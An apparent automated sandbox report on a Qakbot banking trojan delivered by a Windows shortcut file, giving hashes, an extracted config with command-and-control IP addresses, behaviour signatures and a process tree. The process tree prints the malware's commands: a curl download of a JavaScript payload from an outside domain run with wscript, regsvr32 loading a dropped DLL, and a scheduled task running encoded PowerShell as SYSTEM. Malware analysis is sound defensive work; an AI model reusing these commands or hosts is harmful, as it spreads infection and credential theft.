Overview

overview

10

Static

static

Export474.lnk

windows7-x64

3

Export474.lnk

windows10-2004-x64

10

Resubmissions

08-09-2022 20:37

220908-zemtlschgp 10

08-09-2022 18:56

220908-xleqgafcf5 10

Analysis

  • max time kernel
    150s
  • max time network
    127s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-09-2022 18:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Export474.lnk

  • Size

    2KB

  • MD5

    e3bd2b8ab3b2aa72f21d6b1aea8dd4e0

  • SHA1

    279b748f40cc8377d63b630c756c60644e9be89e

  • SHA256

    77fe3b85503872e252ee98f49c1491d7dfc7cb3579ff3771bd7ad59f68c0dc60

  • SHA512

    6aea0405c1eb507611c9ee21ac0ba0b8c2a719653ee1b644e015608ee5d3dae6a706f9b328b26ff3961cd7b690a9dfe1e6f6e30405d78c11efa08711f59b55cb

Score
10/10
qakbotbb1662647912bankerstealertrojan

Malware Config

Extracted

Family

qakbot

Version

403.860

Botnet

BB

Campaign

1662647912

C2

197.94.210.133:443

193.3.19.37:443

70.51.153.182:2222

99.232.140.205:2222

123.240.131.1:443

177.102.84.28:32101

105.156.152.227:443

190.59.247.136:995

89.211.218.88:2222

81.214.220.237:443

85.99.62.74:443

191.97.234.238:995

81.131.161.131:2078

217.165.68.122:993

219.69.103.199:443

37.210.148.30:995

64.207.215.69:443

113.169.57.104:443

179.225.221.169:32101

151.234.99.49:990
Attributes
  • salt

    SoNuce]ugdiB3c[doMuce2s81*uXmcvP

Signatures

  • Qakbot/Qbot

    Qbot or Qakbot is a sophisticated worm with banking capabilities.

    trojanbankerstealerqakbot
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 3 IoCs
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies data under HKEY_USERS 51 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Export474.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4380
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /q /c echo 'HI_U' && MD "C:\Users\Admin\AppData\Local\ur\B4O" && curl.exe --output C:\Users\Admin\AppData\Local\ur\B4O\enhrP.s_1L.QH0w.js https://purepowerinc.net/nluGZ/082.html && cd "C:\Users\Admin\AppData\Local\ur\B4O" && wscript enhrP.s_1L.QH0w.js && echo "Nj"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1148
      • C:\Windows\system32\curl.exe
        curl.exe --output C:\Users\Admin\AppData\Local\ur\B4O\enhrP.s_1L.QH0w.js https://purepowerinc.net/nluGZ/082.html
        3⤵
          PID:3688
        • C:\Windows\system32\wscript.exe
          wscript enhrP.s_1L.QH0w.js
          3⤵
          • Blocklisted process makes network request
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:3556
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C ping go.com && regsvr32 _ssp.dll
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1816
            • C:\Windows\system32\PING.EXE
              ping go.com
              5⤵
              • Runs ping.exe
              PID:832
            • C:\Windows\system32\regsvr32.exe
              regsvr32 _ssp.dll
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:904
              • C:\Windows\SysWOW64\regsvr32.exe
                _ssp.dll
                6⤵
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of WriteProcessMemory
                PID:2128
                • C:\Windows\SysWOW64\explorer.exe
                  C:\Windows\SysWOW64\explorer.exe
                  7⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:5088
                  • C:\Windows\SysWOW64\schtasks.exe
                    "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /Z /ST 20:58 /tn kljqgfijr /ET 21:09 /tr "powershell.exe -encodedCommand cgBlAGcAcwB2AHIAMwAyAC4AZQB4AGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXAB1AHIAXABCADQATwBcAF8AcwBzAHAALgBkAGwAbAAiAA==" /SC ONCE
                    8⤵
                    • Creates scheduled task(s)
                    PID:1252
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -encodedCommand cgBlAGcAcwB2AHIAMwAyAC4AZQB4AGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXAB1AHIAXABCADQATwBcAF8AcwBzAHAALgBkAGwAbAAiAA==
      1⤵
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1148
      • C:\Windows\system32\regsvr32.exe
        "C:\Windows\system32\regsvr32.exe" C:\Users\Admin\AppData\Local\ur\B4O\_ssp.dll
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4676
        • C:\Windows\SysWOW64\regsvr32.exe
          C:\Users\Admin\AppData\Local\ur\B4O\_ssp.dll
          3⤵
          • Loads dropped DLL
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:4532
          • C:\Windows\SysWOW64\explorer.exe
            C:\Windows\SysWOW64\explorer.exe
            4⤵
            • Modifies data under HKEY_USERS
            PID:3664

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Remote System Discovery

    1
    T1018

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\ur\B4O\_ssp.dll
      Filesize

      548KB

      MD5

      640c452ee47770d7d77a0c0ae1a8c4bb

      SHA1

      e095fedc8f40d5b76e76adbc7cce1e22720b14ba

      SHA256

      1b4f615fe1136b4b0f035ed99570e8773e5e74d926735bd0b3ba0f86f30ca290

      SHA512

      f35fc0475a129639dacd1403b467d85e1b368545b1ce23dd02b9e28370b08ad8c7c7fbaea80005872bf8ee79f5e0841e4a71c0a26d378b13e9d7ddbe9e45f80a

      Download Submit
    • C:\Users\Admin\AppData\Local\ur\B4O\_ssp.dll
      Filesize

      548KB

      MD5

      640c452ee47770d7d77a0c0ae1a8c4bb

      SHA1

      e095fedc8f40d5b76e76adbc7cce1e22720b14ba

      SHA256

      1b4f615fe1136b4b0f035ed99570e8773e5e74d926735bd0b3ba0f86f30ca290

      SHA512

      f35fc0475a129639dacd1403b467d85e1b368545b1ce23dd02b9e28370b08ad8c7c7fbaea80005872bf8ee79f5e0841e4a71c0a26d378b13e9d7ddbe9e45f80a

      Download Submit
    • C:\Users\Admin\AppData\Local\ur\B4O\_ssp.dll
      Filesize

      548KB

      MD5

      640c452ee47770d7d77a0c0ae1a8c4bb

      SHA1

      e095fedc8f40d5b76e76adbc7cce1e22720b14ba

      SHA256

      1b4f615fe1136b4b0f035ed99570e8773e5e74d926735bd0b3ba0f86f30ca290

      SHA512

      f35fc0475a129639dacd1403b467d85e1b368545b1ce23dd02b9e28370b08ad8c7c7fbaea80005872bf8ee79f5e0841e4a71c0a26d378b13e9d7ddbe9e45f80a

      Download Submit
    • C:\Users\Admin\AppData\Local\ur\B4O\_ssp.dll
      Filesize

      548KB

      MD5

      640c452ee47770d7d77a0c0ae1a8c4bb

      SHA1

      e095fedc8f40d5b76e76adbc7cce1e22720b14ba

      SHA256

      1b4f615fe1136b4b0f035ed99570e8773e5e74d926735bd0b3ba0f86f30ca290

      SHA512

      f35fc0475a129639dacd1403b467d85e1b368545b1ce23dd02b9e28370b08ad8c7c7fbaea80005872bf8ee79f5e0841e4a71c0a26d378b13e9d7ddbe9e45f80a

      Download Submit
    • C:\Users\Admin\AppData\Local\ur\B4O\_ssp.dll
      Filesize

      548KB

      MD5

      640c452ee47770d7d77a0c0ae1a8c4bb

      SHA1

      e095fedc8f40d5b76e76adbc7cce1e22720b14ba

      SHA256

      1b4f615fe1136b4b0f035ed99570e8773e5e74d926735bd0b3ba0f86f30ca290

      SHA512

      f35fc0475a129639dacd1403b467d85e1b368545b1ce23dd02b9e28370b08ad8c7c7fbaea80005872bf8ee79f5e0841e4a71c0a26d378b13e9d7ddbe9e45f80a

      Download Submit
    • C:\Users\Admin\AppData\Local\ur\B4O\enhrP.s_1L.QH0w.js
      Filesize

      131KB

      MD5

      1d8c3855013bc33cb3738817f9c90ff2

      SHA1

      bafee68fcf37affd0bcd80c37f9d78cec679e687

      SHA256

      c347269c85d0c1762f492ba8aed6c171b40da3a0f8152f6c92997d0940b96884

      SHA512

      a0db22799e5b7741fffff4e1025e6334bb2525f5227da71d51c4f5d82a72aec847f3e3e1493db09a4809c732bd225913fd92f6a14affae60386d63efa164e447

      Download Submit
    • memory/832-137-0x0000000000000000-mapping.dmp
      Download
    • memory/904-138-0x0000000000000000-mapping.dmp
      Download
    • memory/1148-132-0x0000000000000000-mapping.dmp
      Download
    • memory/1148-161-0x00007FFE7FF30000-0x00007FFE809F1000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/1148-156-0x00007FFE7FF30000-0x00007FFE809F1000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/1148-151-0x000002D77FF90000-0x000002D77FFB2000-memory.dmp
      Filesize

      136KB

      Download
    • memory/1252-148-0x0000000000000000-mapping.dmp
      Download
    • memory/1816-136-0x0000000000000000-mapping.dmp
      Download
    • memory/2128-147-0x0000000004890000-0x00000000048B2000-memory.dmp
      Filesize

      136KB

      Download
    • memory/2128-144-0x0000000004860000-0x0000000004884000-memory.dmp
      Filesize

      144KB

      Download
    • memory/2128-143-0x0000000000910000-0x0000000000996000-memory.dmp
      Filesize

      536KB

      Download
    • memory/2128-140-0x0000000000000000-mapping.dmp
      Download
    • memory/2128-145-0x0000000004890000-0x00000000048B2000-memory.dmp
      Filesize

      136KB

      Download
    • memory/3556-134-0x0000000000000000-mapping.dmp
      Download
    • memory/3664-163-0x0000000000D60000-0x0000000000D82000-memory.dmp
      Filesize

      136KB

      Download
    • memory/3664-162-0x0000000000D60000-0x0000000000D82000-memory.dmp
      Filesize

      136KB

      Download
    • memory/3664-159-0x0000000000000000-mapping.dmp
      Download
    • memory/3688-133-0x0000000000000000-mapping.dmp
      Download
    • memory/4532-157-0x0000000003620000-0x0000000003644000-memory.dmp
      Filesize

      144KB

      Download
    • memory/4532-154-0x0000000000000000-mapping.dmp
      Download
    • memory/4532-158-0x0000000003670000-0x0000000003692000-memory.dmp
      Filesize

      136KB

      Download
    • memory/4532-160-0x0000000003670000-0x0000000003692000-memory.dmp
      Filesize

      136KB

      Download
    • memory/4676-152-0x0000000000000000-mapping.dmp
      Download
    • memory/5088-150-0x0000000000E40000-0x0000000000E62000-memory.dmp
      Filesize

      136KB

      Download
    • memory/5088-149-0x0000000000E40000-0x0000000000E62000-memory.dmp
      Filesize

      136KB

      Download
    • memory/5088-146-0x0000000000000000-mapping.dmp
      Download